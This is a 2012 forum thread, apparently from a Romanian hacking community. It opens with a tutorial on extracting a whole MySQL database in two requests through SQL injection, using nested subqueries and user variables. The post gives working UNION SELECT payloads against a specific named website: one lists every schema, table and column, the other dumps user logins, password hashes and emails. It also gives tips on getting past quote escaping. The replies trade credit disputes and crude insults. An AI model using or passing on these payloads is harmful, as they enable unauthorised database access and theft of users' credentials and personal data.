ionut97 Posted December 29, 2012 Report Posted December 29, 2012 by ???Dan & DenJackerWhat we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First of, the database/table/columns. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) PoC:http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function.View the source, and we see every single database/table/column accessible. Now, to grab information from the columns.(select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)PoC:http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+Sursa:TUTORIAL : [All DB In [1] Request] 2 Quote
Andrei Posted January 2, 2013 Report Posted January 2, 2013 Daca imi amintesc bine, denjacker a prezentat la primul defcamp sintaxa. gresesc? Quote
denjacker Posted January 2, 2013 Report Posted January 2, 2013 (edited) Daca imi amintesc bine, denjacker a prezentat la primul defcamp sintaxa. gresesc?http://www.slideshare.net/DefCamp/advanced-data-mining-in-my-sql-injections-using-subqueries-and-custom-variablesIn slide este si varianta cu benchmark .. cea despre care ratangii de pe HF inca n-au habar.Daca o posteaza unu acolo, imediat apar zeci de tutoriale si se umfla toti ca o stiau de cand erau ei mici.Mue HF, MUE 8===> ???Dan Edited January 2, 2013 by denjacker Quote
Andrei Posted January 2, 2013 Report Posted January 2, 2013 Who the fuck is Dan?!LE: Mai arunca un buzz cand esti on. Quote
denjacker Posted January 2, 2013 Report Posted January 2, 2013 This is ???Dan. He touches himself at night ! Quote
Andrei Posted January 2, 2013 Report Posted January 2, 2013 E bine ca macar esti mentionat la autori, desi in realitate ordinea ar trebui sa fie invers. Trebuie sa iasa si astfel de specimene in fata din cand in cand. Quote
